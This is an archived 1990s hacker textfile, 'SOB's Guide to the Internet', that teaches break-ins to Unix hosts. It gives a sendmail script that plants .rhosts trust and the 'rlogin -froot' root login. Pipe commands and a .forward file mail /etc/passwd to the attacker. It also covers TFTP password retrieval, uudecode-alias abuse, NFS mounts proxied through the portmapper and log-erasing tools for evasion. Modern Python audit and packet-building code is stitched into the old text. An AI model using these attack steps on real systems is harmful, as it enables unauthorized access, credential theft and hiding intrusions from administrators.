💾 Archived View for spam.works › mirrors › textfiles › phreak › sobinet.txt captured on 2023-06-16 at 19:49:32.

      _________________ __________/\         ________      .__    .___
     /   _____/\_____  \\______   )/______  /  _____/ __ __|__| __| _/____
     \_____  \  /   |   \|    |  _//  ___/ /   \  ___|  |  \  |/ __ |/ __ \
     /        \/    |    \    |   \\___ \  \    \_\  \  |  /  / /_/ \  ___/
    /_______  /\_______  /______  /____  >  \______  /____/|__\____ |\___  >
            \/         \/       \/     \/          \/              \/    \/
                        __             __  .__
                      _/  |_  ____   _/  |_|  |__   ____
                      \   __\/  _ \  \   __\  |  \_/ __ \
                       |  | (  <_> )  |  | |   Y  \  ___/
                       |__|  \____/   |__| |___|  /\___  >
                                                \/     \/
               .___        __                              __
               |   | _____/  |_  ___________  ____   _____/  |_
               |   |/    \   __\/ __ \_  __ \/    \_/ __ \   __\
               |   |   |  \  | \  ___/|  | \/   |  \  ___/|  |
               |___|___|  /__|  \___  >__|  |___|  /\___  >__|
                        \/          \/           \/     \/

                                By Syncomm [SOB]

"If god wanted the net to be secure he would have given it more Dan Farmers..."
  -Syncomm

-()- Introduction... -()-

 The Internet is an immense place, full of the kinds of sites people once spent
whole lives scanning for dialups to reach... It is also a foolish place, full of
bugs and careless sysadmins. One thing about the Internet is certain... it is
one of the best places to hack!
 In this doc I'm not going to give you a STEP BY STEP guide to hacking out all
the interesting things you find on the "Information Super-Highway" (tm), because
hacking on the Internet can be an extremely involved process... I will, however,
take a look at some of the major bugs and a lot of the maneuvers that can still
be used to attack most places on the net...

-()- A VERY Brief History... -()-

 In the beginning the fools at the US Government built a big nationwide
network. In the end this grew so large that it split into two networks, ARPANET
and MILNET. ARPANET was dedicated to scientific research and MILNET to the
communication of military sites... Later thousands of other networks joined and
the Internet was born...

-()- The Legacy of RLOGIN -()-

"RLOGIN must have been designed by a hacker..." Crypt Keeper [SOB], P/S

 One of the easier ways of getting an account on a remote system is to RLOGIN
into it... if your host is trusted you can get in without a passwd (a lightbulb
goes off in an empty skull somewhere...). The way to get a trusted account is to
have your host listed in a user's .rhosts file, or in /etc/hosts.equiv, in a
format like this...

%cat .rhosts
gnu.ai.mit.edu +
%

 Each line is a hostname, optionally followed by a username. The "+" in the
username field means ANY user on the named host can log into this account from
there without a passwd; with no second field, only the user with the same name
on the remote host gets in.
 When you do get on a system I suggest you see what .rhosts files you have
access to with the command...

%find / -name .rhosts -exec /bin/cat {} ";"

 That will give you a long list that you may want to edit in the future to
"ensure" your access to the system. A lone plus sign on its own line in
/etc/hosts.equiv makes ALL hosts trusted; adding one is the usual move right
after you gain root privileges.
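To see exactly how much trust a .rhosts or /etc/hosts.equiv hands out, here is an added example (not from this doc or the SOB toolset) that parses the format just described and flags the wildcard entries. The sample file is constructed; the "+@netgroup" form is the hosts.equiv(5) netgroup syntax and is an assumption about the target's implementation, as is the decision not to treat any line as a comment (classic implementations read the file literally).

```python
from dataclasses import dataclass


@dataclass
class Finding:
    path: str
    line_no: int
    entry: str
    problem: str


def parse_trust_line(line: str):
    """Split one hosts.equiv/.rhosts line into (host, user); user is None when absent.
    Blank lines yield None. No comment syntax is assumed: the file is read literally."""
    fields = line.split()
    if not fields:
        return None
    return fields[0], (fields[1] if len(fields) > 1 else None)


def audit_trust_file(text: str, path: str) -> list:
    """Flag entries that grant more than same-username-from-one-named-host trust."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        parsed = parse_trust_line(raw)
        if parsed is None:
            continue
        host, user = parsed
        entry = raw.strip()
        if host == "+":
            findings.append(Finding(path, n, entry,
                                    "wildcard host: every host on the net is trusted"))
        elif host.startswith("+@"):  # assumed netgroup syntax, hosts.equiv(5)
            findings.append(Finding(path, n, entry,
                                    f"every host in netgroup {host[2:]} is trusted"))
        if user == "+":
            findings.append(Finding(path, n, entry,
                                    "wildcard user: any remote user can log in, not just the same username"))
        elif user is not None and user.startswith("+@"):
            findings.append(Finding(path, n, entry,
                                    f"every user in netgroup {user[2:]} is trusted"))
    return findings


def summarize(findings) -> str:
    """One line per finding, in the file:line style grep uses."""
    return "\n".join(f"{f.path}:{f.line_no}: {f.entry!r}: {f.problem}" for f in findings)


# Constructed sample: line 1 is the entry shown in the doc, line 2 is the lone "+"
# that trusts everyone, line 3 is an ordinary same-username entry.
SAMPLE_RHOSTS = "gnu.ai.mit.edu +\n+\nfriend.example.org\n"

if __name__ == "__main__":
    print(summarize(audit_trust_file(SAMPLE_RHOSTS, "/home/someone/.rhosts")))
```

Point it at the files the find command above turns up (and at /etc/hosts.equiv); a clean file produces no findings at all, so anything printed is worth a second look.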

 One technique for creating a .rhosts file on a remote site uses sendmail.
Example:

%cat evil
# Evil Sendmail Script
telnet site.name.com 25 << EOSM
rcpt to:/home/name/.rhosts
mail from: r3w+
data
(garbage)
.
rcpt to: /home/name/.rhosts
mail from:r3w+
data
yoursite.name.com +
.
quit
EOSM

%/bin/sh evil
Trying 666.666.666.1
Connected to satan.com
Escape character is '^]'.
Connection closed by foreign host.

%rlogin site.name.com -l name
   -*- Welcome to satan.com -*-
satan%

This trick works on all Berkeley Sendmail versions prior to 5.59.

 Another trick involving sendmail is to telnet to port 25 and give the sender
as "|/bin/echo "yoursite.name +" > /etc/hosts.equiv"; the pipe gets run when
sendmail tries to return mail to that "address".

AIX and some Linux rlogind versions can be exploited with a HUGE rlogin hole,
which has been patched on most systems. The "-f" in the user name is passed
straight through to login as its "already authenticated" flag. The format is:

%rlogin site.name.com -l -froot
   -*- Welcome to site.name.com -*-
site%tprof -x /bin/sh

This logs you in as root and lets you edit any file.

 You may also want to take a look and make sure the system doesn't allow an
unpassworded "RSH" (remote shell)... I found a few systems that I was able to
RSH into and snoop around gathering information that helped me hack them in the
future.

-()- FTP and TFTP -()-

 File Transfer Protocol has long been abused to get passwd files from hosts...
an old bug that still pops up occasionally is the "ftp -n" trick (-n only turns
off auto-login so you can send the commands by hand, in this order):

%ftp -n
ftp> open site.name.com
Connected to site.name.com
220 site.name.com FTP server ready.
ftp> quote user ftp
331 Guest login okay, send ident as password.
ftp> quote cwd ~root
530 Please send login with USER and PASS.
ftp> quote pass ftp
230 Guest login okay, access restrictions apply.
ftp>

If this works you are in as root and can modify all directories and files.

 Another FTP trick is to log in as "anonymous" or "ftp" and upload a file
called .forward into the ftp account's home directory. The .forward file should
contain "|/bin/mail you@yoursite.com < /etc/passwd". Now mail a letter to "ftp"
or "anonymous" at that site and the passwd file lands in your mailbox.

TFTP also has a huge bug on some systems: the daemon runs with no access
restrictions at all, so any file it can read can be fetched. You almost never
see this bug these days... but you never know!

%tftp site.name.com
tftp> get /etc/passwd

This will get you the actual passwd file on some systems...

-()- X Windows -()-

 X Windows is a big risk because displays can be monitored remotely... take a
look at the xwatch.sh file that SHOULD have come with this doc...

-()- Sendmail -()-

 A lot of versions before sendmail 5.59 had a bug in which you could specify
your name as a "|" followed by a command... such as

mail from: "|/bin/mail you@your.site.name < /etc/passwd"

 Sendmail can also be helpful for finding users on a system with the 'expn' and
'vrfy' commands, as follows...

%telnet target.com 25
Connecting to host target.com (666.666.666.1), port 25
connection open
220 target.com Sendmail 5.5/target ready at Sun, 7 July 94 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit

Finding the mail alias "decode" gives you a nice bug... anything mailed to it is
piped straight into uudecode, which writes the decoded file wherever the begin
line says, so you can add a host name to nearly any account's .rhosts (limited
by which user uudecode runs as, i.e. who the decode alias belongs to). Ex.

% echo "your.site.name" | uuencode /home/idiot/.rhosts | mail decode@target.com
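As an added example (not part of this doc), here is what that one-liner actually puts in the mail body, and the check a sysadmin would bolt in front of a decode alias: it pulls the output name out of the begin line and refuses absolute paths, ".." components and dotfiles. The target path and body text are constructed to match the command above; uudecode honouring the begin-line path is the behaviour the section relies on.

```python
import binascii
import posixpath


def uuencode(data: bytes, name: str, mode: str = "644") -> str:
    """Render data the way uuencode(1) does: a begin line naming the output file,
    45-byte chunks, the lone "`" terminator line, then "end"."""
    lines = [f"begin {mode} {name}"]
    for i in range(0, len(data), 45):
        lines.append(binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n"))
    lines.append(binascii.b2a_uu(b"").decode("ascii").rstrip("\n"))  # the "`" line
    lines.append("end")
    return "\n".join(lines) + "\n"


def uudecode(text: str):
    """Return (target_name, data) from a message body, or None if it holds no uuencoded file.
    Mail headers and anything else before the begin line are skipped, as uudecode does."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if line.startswith("begin "):
            break
    else:
        return None
    _, _, name = line.split(" ", 2)  # "begin MODE NAME", NAME may contain spaces
    data = b""
    for body_line in lines[i + 1:]:
        if body_line == "end":
            break
        data += binascii.a2b_uu(body_line)
    return name, data


def unsafe_decode_target(name: str) -> list:
    """Reasons a mail-fed uudecode should refuse to write to this output name."""
    reasons = []
    if name.startswith("/"):
        reasons.append("absolute path")
    if ".." in name.split("/"):
        reasons.append("parent directory reference")
    if posixpath.basename(name).startswith("."):
        reasons.append("dotfile")
    return reasons


def check_decode_message(body: str) -> list:
    """Filter logic for a decode alias: an empty list means a plain relative file name."""
    decoded = uudecode(body)
    if decoded is None:
        return ["no uuencoded file"]
    return unsafe_decode_target(decoded[0])


# Constructed sample: the body produced by the echo | uuencode pipeline above.
EVIL_BODY = uuencode(b"your.site.name\n", "/home/idiot/.rhosts")

if __name__ == "__main__":
    print(EVIL_BODY)
    print("rejected because:", check_decode_message(EVIL_BODY))
```

The real fix is of course to drop the decode alias (or point it at a uudecode that is confined to one scratch directory); the check above is what you run over the alias's mail spool to see who has already tried it.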

-()- NIS -()-

 NIS, NFS, and almost every other form of RPC is plagued with bugs... With the
proper tools almost anyone can get a passwd file from a system running NIS. The
popular way is to use YPX (tm), which should have come with this doc. There are
other, better tools such as RPCToolKit and NFS (by Leendert) which make handling
sites running RPC easier.
 One important thing to note is that the directory /var/yp contains the NIS
domain name of the host. So if the directory /var/yp is world readable, or if
/var is exported, then you have the domain name.
 Normally, a remote (network) file system is mounted by asking the mount
daemon on the machine where the file system lives to perform a mount RPC. The
result of this RPC is the file handle of the root of the remote file system. As
a security measure the mount daemon checks the source machine of the request
against a list of allowable machines (this list is found in /etc/exports). If
the requester's machine is not in the export list, the mount RPC will of course
fail. One could argue against the fitness of this security approach, but in
common day practice it seems sufficient.
 However, a special feature of the portmapper (alias rpcbind) allows you to
circumvent this check. The portmapper provides an indirect (or proxy) RPC
service: you hand the portmapper the program, version, procedure and parameters
of an RPC and it makes the call for you. This feature, as you have probably
guessed by now, lets you perform indirect mount calls. Since the source of the
request (from the mount daemon's point of view) is its own local machine, such
a request is often granted. This only works if the local machine is mentioned in
the export list for its own exportable file systems, but with netgroup
facilities this is often the case.
 Note that once the mount call succeeds we have a handle for the remote file
system and there is no stopping us. Using this file handle we can perform NFS
requests by addressing the remote NFS server directly. There is no need to go
through the portmapper for this, since the NFS server does no further check on a
requester that can present a good file handle. This has the added advantage that
we can supply our own Unix (AUTH_UNIX) authentication information, something
that can't be done through the portmapper's indirect RPC feature, so we can set
the Unix user id to whatever we like.
 Both tricks (the proxied mount and talking to the NFS server directly with the
handle) are what Leendert's program NFS uses, so they may be patched on some
systems.
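To make the proxy trick concrete, here is an added example (not Leendert's NFS code) that builds the PMAPPROC_CALLIT request carrying a MOUNTPROC_MNT call, plus the decoder a network monitor would use to spot one on UDP port 111. Program, version and procedure numbers are the ones from RFC 1057 (portmapper) and RFC 1094 (mount); the xid and the exported path are constructed. Note that the outer call only carries AUTH_NULL, which is exactly the limitation the text mentions: the portmapper forwards the arguments, not your credentials.

```python
import struct

# Well-known RPC numbers from RFC 1057 (portmapper) and RFC 1094 (mount protocol).
PMAP_PROG, PMAP_VERS = 100000, 2
PMAPPROC_GETPORT, PMAPPROC_CALLIT = 3, 5
MOUNT_PROG, MOUNT_VERS, MOUNTPROC_MNT = 100005, 1, 1
RPC_CALL, RPC_VERSION, AUTH_NULL = 0, 2, 0


def xdr_uint(n: int) -> bytes:
    return struct.pack(">I", n)


def xdr_opaque(data: bytes) -> bytes:
    """Variable-length opaque: 4-byte length, the bytes, zero padding to a 4-byte boundary."""
    return xdr_uint(len(data)) + data + b"\x00" * ((-len(data)) % 4)


def xdr_string(s: str) -> bytes:
    return xdr_opaque(s.encode("ascii"))


def rpc_call(xid: int, prog: int, vers: int, proc: int, params: bytes) -> bytes:
    """RFC 1057 CALL message with AUTH_NULL credentials and verifier (UDP: no record mark)."""
    header = struct.pack(">6I", xid, RPC_CALL, RPC_VERSION, prog, vers, proc)
    auth_null = xdr_uint(AUTH_NULL) + xdr_opaque(b"")
    return header + auth_null + auth_null + params


def proxied_mount_request(xid: int, dirpath: str) -> bytes:
    """The indirect call described above: ask the portmapper to forward MOUNTPROC_MNT(dirpath).
    CALLIT args are (prog, vers, proc, opaque args); the mount daemon sees localhost as the source."""
    mnt_args = xdr_string(dirpath)
    callit_args = struct.pack(">3I", MOUNT_PROG, MOUNT_VERS, MOUNTPROC_MNT) + xdr_opaque(mnt_args)
    return rpc_call(xid, PMAP_PROG, PMAP_VERS, PMAPPROC_CALLIT, callit_args)


class XdrReader:
    def __init__(self, buf: bytes):
        self.buf, self.pos = buf, 0

    def uint(self) -> int:
        (value,) = struct.unpack_from(">I", self.buf, self.pos)
        self.pos += 4
        return value

    def opaque(self) -> bytes:
        n = self.uint()
        data = self.buf[self.pos:self.pos + n]
        self.pos += n + (-n) % 4
        return data


def parse_call(msg: bytes) -> dict:
    """Decode the fixed RPC call header and return the procedure parameters that follow it."""
    r = XdrReader(msg)
    names = ("xid", "mtype", "rpcvers", "prog", "vers", "proc")
    call = {name: r.uint() for name in names}
    for _ in ("cred", "verf"):
        r.uint()    # auth flavor
        r.opaque()  # auth body
    call["params"] = msg[r.pos:]
    return call


def proxied_target(msg: bytes):
    """If msg is a PMAPPROC_CALLIT request, return (prog, vers, proc, args) of the forwarded call."""
    call = parse_call(msg)
    if call["mtype"] != RPC_CALL or call["prog"] != PMAP_PROG or call["proc"] != PMAPPROC_CALLIT:
        return None
    r = XdrReader(call["params"])
    return r.uint(), r.uint(), r.uint(), r.opaque()


def is_proxied_mount(msg: bytes) -> bool:
    """Detection check: a CALLIT whose forwarded target is the mount daemon's MNT procedure."""
    target = proxied_target(msg)
    return target is not None and target[0] == MOUNT_PROG and target[2] == MOUNTPROC_MNT


if __name__ == "__main__":
    packet = proxied_mount_request(0x1234, "/export/home")  # constructed xid and path
    print(packet.hex())
    print("proxied mount:", is_proxied_mount(packet))
```

The same decoder, fed UDP payloads addressed to port 111, gives you a one-line rule for the thing the portmapper patch is meant to stop: any CALLIT aimed at program 100005 is a mount request that is trying to look local.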

-()- Evasion -()-

 It has always been a good idea to erase your tracks on a remote host... a
simple way to get yourself out of the system logs (i.e. the UTMP, WTMP, syslog,
etc.) is to use a program called ZAP, which AGAIN should be included with this
doc. NOTE: You must be root to use this program.

Be on the lookout for updates to this file on the following BBSs:

                     ___                            ___
  :              ___/  /\                          /\  \___
             ___/  /  / _\________________________/_ \  \  \___          :
  |      ___/  /  /  / /_                           \ \  \  \  \___
 _|_____/  /  /  /  / //      SOB MEMBER BOARDS      \ \  \  \  \  \_____|_
/______/__/__/__/__/ /________________________________\ \__\__\__\__\______\
\      \  \  \  \  \ \________________________________/ /  /  /  /  /      /
 \______\__\__\__\__\/                                \/__/__/__/__/______/
  :                                                                      :
  !       Utopia             -*SOB WORLD HQ*-           (210) PRI-VITE   !
  |   Social Deception         -*SOB USHQ*-             (606) 261-3442   |
  | Arrested Development    -*SOB Holland HQ*-           +31-77-547477   |
  |   Lucid Nightmare       -*SOB Eastern HQ*-          (703) 758-1655   |
  | Celestial Woodlands      -*SOB Dist. S.*-           (409) 764-2843   |
  !    Purple Hell           -*SOB Dist. S.*-           (806) 791-0747   !
  |   Paradise Lost          -*SOB Dist. S.*-           (414) 476-3181   |
  |  Cyberspace.net       -*SOB I-Net Dist. S.*-           /pub/SOB      |
  :__________________                                  __________________:
 /      /  /  /  /  /\________________________________/\  \  \  \  \      \
/______/__/__/__/__/ /________________________________\ \__\__\__\__\______\
\______\  \  \  \  \ \                              _ / /  /  /  /  /______/
  |     \__\  \  \  \ \                             // /  /  /  /__/     |
  :         \__\  \  \ \____________________________/ /  /  /__/         :
                \__\  \  /                        \  /  /__/
                    \__\/                          \/__/